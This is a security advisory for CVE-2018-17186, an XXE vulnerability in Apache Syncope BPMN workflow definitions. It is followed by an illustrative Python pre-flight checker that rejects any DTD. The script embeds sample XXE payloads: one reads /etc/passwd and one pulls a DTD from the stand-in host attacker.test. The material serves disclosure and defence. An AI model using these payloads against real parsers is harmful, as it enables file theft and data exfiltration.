Francesco Chicchiriccò
2018-11-06 09:05:59 UTC
CVE-2018-17186: XXE on BPMN definitions
Description:
An administrator with workflow definition entitlements can use DTD to
perform malicious operations, including but not limited to file read,
file write, and code execution.
Severity: Medium
Vendor: The Apache Software Foundation
Affects:
Releases prior to 2.1.2
Releases prior to 2.0.11
The unsupported 1.2.x releases may also be affected.
Solution:
2.0.X users should upgrade to 2.0.11
2.1.X users should upgrade to 2.1.2
Mitigation:
Do not assign workflow definition entitlements to any administrator.
Credit:
This issue was discovered by Kevin Borras Soler and Joan Bono.
References:
https://syncope.apache.org/security
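As an added illustration (not the project's code, and not the fix shipped in 2.0.11 and 2.1.2, which lives in the Java code base), the following Python script shows what a DTD-carrying BPMN workflow definition looks like, both an inline file-read variant and a blind parameter-entity variant, and a fail-closed pre-flight check that reports any DOCTYPE or entity declaration before the document is handed to the parser that feeds the workflow engine. It relies on Python's bundled expat bindings, which expand no external entities and fetch no external subsets during this check. The BPMN samples, the process ids and the attacker.test host are constructed for this example.

```python
"""Pre-flight check for BPMN workflow definitions: reject any use of a DTD
(DOCTYPE, general or parameter entity declarations) before the document
reaches the XML parser that feeds the workflow engine.

Example code, not Apache Syncope's own implementation."""
import xml.parsers.expat

# Constructed samples for this example (not taken from the advisory).
BENIGN_BPMN = b"""<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
             targetNamespace="http://example.test/bpmn">
  <process id="userWorkflow" isExecutable="true">
    <startEvent id="start"/>
    <endEvent id="end"/>
  </process>
</definitions>
"""

# Classic XXE: an external general entity whose content is echoed back
# through an element the administrator can later read.
XXE_FILE_READ = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE definitions [
  <!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL">
  <process id="userWorkflow" isExecutable="true">
    <documentation>&passwd;</documentation>
  </process>
</definitions>
"""

# Blind / out-of-band XXE: a parameter entity pulls an attacker-hosted DTD
# (attacker.test is a constructed hostname).
XXE_BLIND = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE definitions [
  <!ENTITY % remote SYSTEM "http://attacker.test/evil.dtd">
  %remote;
]>
<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL">
  <process id="userWorkflow" isExecutable="true"/>
</definitions>
"""


def find_dtd_usage(xml_bytes):
    """Parse xml_bytes with expat and return a list of findings describing
    every DTD construct seen. An empty list means the document carries no
    DTD. Nothing is expanded or fetched: the handlers only record."""
    findings = []
    parser = xml.parsers.expat.ParserCreate()
    # Never load the external subset or parameter entities during the check.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        detail = "internal subset" if has_internal_subset else "no internal subset"
        if system_id:
            detail += f", external subset {system_id!r}"
        findings.append(f"DOCTYPE {name!r} declared ({detail})")

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        kind = "parameter" if is_parameter else "general"
        if system_id is not None:
            findings.append(f"external {kind} entity {name!r} -> {system_id!r}")
        else:
            findings.append(f"internal {kind} entity {name!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except xml.parsers.expat.ExpatError as exc:
        # Fail closed: a document we cannot parse is not accepted either.
        findings.append(f"not well-formed: {exc}")
    return findings


def is_safe_workflow_definition(xml_bytes):
    """True only when the definition is well-formed and uses no DTD at all."""
    return not find_dtd_usage(xml_bytes)


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_BPMN),
                       ("file-read XXE", XXE_FILE_READ),
                       ("blind XXE", XXE_BLIND)):
        print(f"{label}: safe={is_safe_workflow_definition(doc)}")
        for finding in find_dtd_usage(doc):
            print("  -", finding)
```

Rejecting every DOCTYPE, rather than trying to enumerate dangerous entities, is the same posture as disabling doctype declarations on the server-side parser: BPMN definitions have no legitimate need for a DTD, so the check can be strict without breaking valid workflows.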